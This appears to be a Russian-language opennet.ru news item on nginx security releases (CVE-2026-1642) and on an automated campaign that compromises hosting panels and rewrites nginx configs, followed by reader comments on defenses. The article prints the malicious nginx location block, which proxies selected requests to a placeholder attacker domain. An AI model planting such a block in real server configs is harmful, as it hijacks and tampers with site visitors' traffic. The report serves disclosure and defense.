Nginx 1.29.4 с устранением уязвимости. Атаки, меняющие настройки nginx для перенаправления трафика

05.02.2026 19:19 (MSK)

Сформирован выпуск основной ветки nginx 1.29.5, в рамках которой продолжается развитие новых возможностей, а также выпуск параллельно поддерживаемой стабильной ветки nginx 1.28.2, в которую вносятся только изменения, связанные с устранением серьёзных ошибок и уязвимостей. В обновлениях устранена уязвимость (CVE-2026-1642), позволяющая атакующему, имеющему возможность вклиниться (MITM) в канал связи между nginx и upstream-сервером, подставить отправляемые клиенту ответы. Проблема затрагивает конфигурации, проксирующие запросы (HTTP 1.x, HTTP/2, gRPC или uWSGI) к вышестоящему серверу с использованием TLS-шифрования.

Помимо уязвимости в выпуске 1.29.5 снижен с "crit" до "info" уровень логгирования SSL-ошибок "ech_required", а также устранено несколько проблем: устранено обращение к уже освобождённой памяти (use-after-free) после переключения на следующий бэкенд gRPC или HTTP/2; решена проблема с отправкой некорректного запроса HTTP/2 после переключения на следующий upstream-сервер; исправлено разрастание размера ответа с несколькими диапазонами; налажено выставление переменной HTTP_HOST при проксировании к бэкендам FastCGI, SCGI и uwsgi.

Дополнительно можно отметить выявление автоматизированной атаки, которая после успешного взлома серверов ограничивается изменением конфигурации nginx. Взлом осуществляется через неисправленную уязвимость React2Shell в серверных компонентах React на системах с панелями управления хостингом, такими как Baota (BT). Вносимые в конфигурацию nginx изменения перенаправляли запросы к обслуживаемым сайтам на сервер атакующих, который осуществлял подстановку вредоносных изменений в возвращаемый пользователю ответ.


   location /%PATH%/ {
       set $fullurl "$scheme://$host$request_uri";
       rewrite ^/%PATH%/?(.*)$ /index.php?domain=$fullurl&$args break;
       proxy_set_header Host [Attacker_Domain];
       proxy_set_header X-Real-IP $remote_addr;
       proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
       proxy_set_header X-Forwarded-Proto $scheme;
       proxy_set_header User-Agent $http_user_agent;
       proxy_set_header Referer $http_referer;
       proxy_ssl_server_name on;
       proxy_pass http://[Attacker_Domain];
   }

Таким образом вместо установки руткитов или вредоносного ПО на сервер, организована атака на клиентов, открывающих обслуживаемый на сервере сайт, без непосредственного изменения компонентов сайта на сервере. Атака в основном нацелена на перехват трафика доменов азиатских стран, а также доменов *.edu и *.gov. Через сервер атакующих перенаправляются выборочные запросы, например, содержащие в путях слова "pg", "pgslot", "slot", "game", "casino", "live", "help", "news", "page", "blog", "about", "support" и "info". Атака производится автоматизированно с использованием инструментария, выполняющего поиск и анализ конфигурации nginx, выбор и подстановку шаблона настроек, перезапуск nginx и проверку работы изменённого варианта.

исправить +8 +/–

Лицензия: CC BY 3.0

Короткая ссылка: https://opennet.ru/64747-nginx

Ключевые слова: nginx, attack

При перепечатке указание ссылки на opennet.ru обязательно

Обсуждение (14)

1.2, FSA (ok), 20:26, 05/02/2026 [ответить] [﹢﹢﹢] [ · · · ]	+/–
А почему React приложение имеет доступ к конфигурации nginx? Оно же вроде под отдельным пользователем должно было быть, а сам nginx работает под отдельным пользователем.

2.3, Аноним (3), 20:32, 05/02/2026 [^] [^^] [^^^] [ответить]	+/–
Получали доступ к панели управления хостингом.

3.11, FSA (ok), 20:54, 05/02/2026 [^] [^^] [^^^] [ответить]	+2 +/–
Ааа, блин, читаю книгу, вижу фигу. Точно.

3.25, Аноним (25), 08:37, 06/02/2026 [^] [^^] [^^^] [ответить]	+1 +/–
И что это меняет? Уязвимость в react SSR, то есть там какой-то NextJS крутится, который делает серверный пререндеринг React. То, что бэкенд, который вносит изменения в конфигурацию nginx, крутится под тем же пользователем - это, мягко скажем, неосмотрительно (или они это вообще в NextJS засунули? Ну тогда вообще феерично). А в идеале, даже бэкенд должен просто класть задачи в очередь, а демон, который обновляет конфигурацию, выполняет задания из очереди. Так вообще можно разнести саму панель и управляемые ей сервера. Впрочем, для писателей панелей такой примитивный подход - это типично. Те, кто умеют пользоваться хотя бы puppet или, там, cfengine, панели не пишут, им оно не надо.

4.28, 1 (??), 09:10, 06/02/2026 [^] [^^] [^^^] [ответить]	+1 +/–
Ну значит положили в очередь задание на изменение конфигурации nginx ... делов-то.

1.4, Rev (ok), 20:33, 05/02/2026 [ответить] [﹢﹢﹢] [ · · · ]	–2 +/–
Так, я не понял, после обновления nginx надо проверить все его конфиги на предмет изменения?

2.7, Аноним (7), 20:44, 05/02/2026 [^] [^^] [^^^] [ответить]	+2 +/–
Желательно всегда это делать, и не только с nginx.

2.26, КО (?), 09:05, 06/02/2026 [^] [^^] [^^^] [ответить]	+/–
У Вас панель управления хостингом на Реакте?

1.22, ebassi (?), 07:16, 06/02/2026 [ответить] [﹢﹢﹢] [ · · · ]	+/–
Как быстро в Дебиане это исправят?

2.24, Аноним (24), 08:16, 06/02/2026 [^] [^^] [^^^] [ответить]	+/–
https://security-tracker.debian.org/tracker/CVE-2026-1642 Скоро узнаем

2.27, КО (?), 09:08, 06/02/2026 [^] [^^] [^^^] [ответить]	+/–
Что пнель управления Nginx на Реакте или возможность влезть между Nginx и сервером приложений? В первом случае - ССЗБ, во втором этот контур лучше вообще держать недоступным для третьих лиц.

1.30, Аноним (30), 09:29, 06/02/2026 [ответить] [﹢﹢﹢] [ · · · ]	+/–
А chattr +i и правильные права/владелец на конфиги не спасает ?

2.31, 1 (??), 10:12, 06/02/2026 [^] [^^] [^^^] [ответить]	+/–
И для чего тогда "панель управления на React" ?

1.32, Аноним (32), 10:13, 06/02/2026 [ответить] [﹢﹢﹢] [ · · · ]	+/–
Вообще то это очень интересный подход, атаковать не сам сервис, доступ к его конфигурации, а под это могут попасть не только веб-сервера...

игнорирование участников | лог модерирования

Добавить комментарий

Текст: